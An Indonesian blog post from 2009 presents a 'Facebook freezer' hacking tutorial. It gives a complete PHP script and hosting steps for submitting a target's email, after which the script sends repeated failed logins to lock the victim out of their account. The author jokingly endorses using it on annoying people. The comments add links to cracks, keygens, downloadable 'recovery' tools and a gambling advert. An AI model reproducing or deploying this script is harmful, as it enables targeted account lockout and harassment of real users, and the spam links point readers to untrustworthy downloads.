twitter
    See You (Soon)...

2009/08/27

Let's Freeze It !! Tutorial Hacking Facebook

Siapa sih saat ini yang ga kenal sama yang namanya Facebook? Tua, muda bahkan anak - anak jaman sekarang banyak yang sudah tidak asing lagi dengan social - networking site yang satu ini. Saat ini situs yang diprakarsai oleh Mark Zuckerberg ini memang sedang booming di Indonesia, bahkan dunia. Tak heran jika kini banyak kita jumpai orang - orang yang betah nongkrong di warnet atau tempat yang ada hot spot-nya hanya untuk online Facebook.

Nah di postingan kali ini, saya akan membahas mengenai tutorial cara menghack (membekukan) akun / email Facebook seseorang. Seperti diketahui, berbeda dengan situs tetangga, Friendster, Facebook memiliki sistem sekuriti yang jauh lebih kompleks sehingga pada awalnya menyulitkan para hacker yang ingin menjebol sistem keamanan situs ini. Namun ada ungkapan tak ada gading yang tak retak, serumit apapun sistem itu pasti suatu saat akan jebol juga. Dan baru - baru ini telah berhasil ditemukan cara menjebol akun Facebook seseorang.

Seperti yang saya katakan di awal, berbeda dengan hacking di Friendster di mana dulu (ga tau sekarang) kita bisa mendapati password seseorang, namun yang dimaksud dengan hacking Facebook di sini lebih tepatnya 'hanya'  dengan membekukan akun Facebook seseorang sehingga dia tidak akan bisa melakukan Log In. Nah berhubung malam semakin gelap, perut semakin keroncongan, mata semakin lengket, saya persingkat saja tutorial ini. Berikut langkah - langkahnya :

  1.  Langkah pertama, Anda terlebih dahulu harus memiliki akun (sign up) di situs free hosting seperti http://www.ripway.com/, http://www.ifastnet.com/, dan masih banyak lagi (coba googling aja pake keyword 'free hosting').
  2.  Copy script di bawah ini, masukkan ke text editor kesukaan Anda (semisal Notepad, Wordpad). Save dengan eksistensi .php. Contoh : coba.php

    <?
    echo "<html><title>PHP Facebook Freezer</title><head><meta http-equiv=\"refresh\" content=\"600\"></head><body>";
    echo "<br><form method=post>Email : <input name=email><input type=submit value=Submit></form><br><br>";
    $email=$_POST['email'];
    $passwd='123';
    if(isset($email) && isset($passwd)){
    $kue="/tmp/".rand().".txt";
    $url='https://login.facebook.com/login.php';
    $login="email=$email&pass=$passwd&login=Log In";
    define("_COK_", $kue);
    curlget($url);
    for ($number=1; $number<=30; $number++) {
    $data=curlpost($url,$login);
    }
    echo $data;
    }
    function curlget($url){
    $agent=$_SERVER['HTTP_USER_AGENT'];
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_URL,$url);
    curl_setopt($curl, CURLOPT_USERAGENT, $agent);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
    curl_setopt($curl, CURLOPT_ENCODING, "");
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
    curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
    $data = curl_exec($curl);
    curl_close ($curl);
    return $data;
    }
    function curlpost($url,$post){
    $agent=$_SERVER['HTTP_USER_AGENT'];
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_URL,$url);
    curl_setopt($curl, CURLOPT_USERAGENT, $agent);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    curl_setopt($curl, CURLOPT_ENCODING, "");
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
    curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
    curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
    $data = curl_exec($curl);
    curl_close ($curl);
    return $data;
    }
    echo "</body></html>";
    ?>


  3. Upload file tadi ke dalam situs free hosting yang sudah Anda daftar tadi.
  4. Jangan lupa copy link upload-an Anda. Misal :  http://www.ripway.com/coba.php
  5. Langkah terakhir, buka website berikut melalui Internet Explorer atau Mozilla Firefox : http://facebookfreezer.com/fb.php atau http://www.ripway.com/coba.php
  6. Masukkan email target, lalu tekan submit. Selesai ! :)
Saran saya, lakukan upload beserta submit email target di satu tempat (satu IP Address), tapi kalo Anda mau mencoba di tempat lain, silahkan, soalnya saya sendiri belum pernah nyoba jadi ga berani jamin (percobaan saya dengan mengorbankan akun Facebook sendiri.. huhuhu) :(

Jangan khawatir atau takut bila akun Facebook tersebut akan selamanya mokad. Karena sebenarnya langkah - langkah pencegahannya sangat mudah :
  • Ketika email target beku (freeze) maka pihak Facebook akan menawarkan untuk membuat password baru.
  • Anda hanya butuh konfirmasi kode yang akan dikirim pihak Facebook ke email tersebut setelah disetujui.
  • Masukkan kode konfirmasi ke kotak verifikasi, tekan submit.
  • Anda akan diminta untuk menulis password baru.
  • Taraaa... Email tersebut akan berfungsi seperti semula (dapat digunakan Log In).
Yah mungkin cukup segini dulu tutorial kali ini. Mata udah terasa lengket udah mau ganti hari nih, mana besok  mesti bangun sahur lagi. Oh iya, perlu diingat, tutorial ini hanya bersifat informasi. Saran saya, usahakan agar tidak digunakan untuk mengerjai orang lain karena hanya akan memberikan dampak buruk bagi hubungan Anda dengan orang tersebut. Tapi kalo orangnya emang bener - bener rese sih silahkan aja biar kapok tuh orang... heuheu.. PEACE!!!

Incoming Suggestion

- facebook hacking hack
- cara hacking hack akun account facebook
- tutorial hacking hack akun account facebook
- hacking hack facebook orang lain



Dapatkan update hacking tutorial, tips dan trik menarik seputar teknologi, download full software, belajar bisnis internet, dan masih banyak lagi langsung ke email Anda sekarang juga!


Related Post



18 komentar:

  1. good trick remain to posting.

    way of hacking alexa traffic ??? click here

    find crack,keygen,torrentor serial key ?? click
    here

    how to Eliminate Message Of Windows Genuine Advantage (WGA) at Windows XP ??? click
    here

    How to increase the number of visitors to blog ??? click
    here

    BalasHapus
  2. tutorialnya lengkap neh... hehehheeh..
    sip dah...

    BalasHapus
  3. waahhh sungguh menakutkan.. ck ck ck ... hebadd hebadd kang :) makasii tuk kunjungan berikut doa nya iia :)

    BalasHapus
  4. Mantap kang tutorialnya...rupanya FB juga bisa di hack ya kan......makasih infonya kang

    BalasHapus
  5. huwaaa..jangan sampe ini dipraktekin ke orang lain ah.

    BalasHapus
  6. @genial : sama2 mas ato mba nih,, hiks..
    @sudino dinoe : iya nih, ok sama2...
    @mba henny : hihihi tenang,, for educational purpose only.. :)

    BalasHapus
  7. segera di coba om tutorialnya....btw salam kenal

    BalasHapus
  8. adi mantap bro...
    tp knapa harus ada hack fb..
    krena di fb semua adalah teman...

    BalasHapus
  9. kok punya gue ada tulisan gini deh


    Fatal error: Call to undefined function: curl_init() in \\192.168.0.16\webfiles\files\2009-9\3192004\try.php on line 19

    itu kenapa ? hehe

    BalasHapus
  10. @anonim : mungkin belum aktif upload an hosting kamu.. coba diupload lagi, terus coba lewat link ini deh, http://facebookfreezer.com/fb.php, semoga membantu.. :)

    BalasHapus
  11. Coba aja pake ini klo yahoo coba http://www.4shared.com/file/133478285/2bcbb52d/Recovery_account_Yahoo_v20.html

    BalasHapus
  12. hahaha klo mau paham pelajari aja HTML search di google.com nih kasi info baru

    http://www.4shared.com/file/133494714/7e23fdc0/Ground_Zeros_v20.html

    BalasHapus
  13. @Jonga & Anonim : thanks ya buat tambahannya... :D

    BalasHapus
  14. http://facebookfreezer.com/fb.php iku tidak ada temoat untuk masukkan email spt yg anda sarankan. Kali dah berubah itu. coba lihat.

    BalasHapus
  15. Pengen yang lebih seru ...
    Ayo kunjungi www.asianbet77.com
    Buktikan sendiri ..

    Real Play = Real Money

    - Bonus Promo Red Card pertandingan manapun .
    - Bonus Mixparlay .
    - Bonus Tangkasnet setiap hari .
    - New Produk Sabung Ayam ( minimal bet sangat ringan ) .
    - Referal 5 + 1 % ( seumur hidup ) .
    - Cash Back up to 10 % .
    - Bonus Royalty Rewards setiap bulan .

    Untuk Informasi lebih jelasnya silahkan hubungi CS kami :
    - YM : op1_asianbet77@yahoo.com
    - EMAIL : melasian77cs@gmail.com
    - WHATSAPP : +63 905 213 7234
    - WECHAT : asianbet_77
    - SMS CENTER : +63 905 209 8162
    - PIN BB : 2B4BB06A / 28339A41

    Salam Admin ,
    asianbet77.com

    Download Disini

    BalasHapus

Every of your opinion would be very valuable for me...

So write your comment, please... :)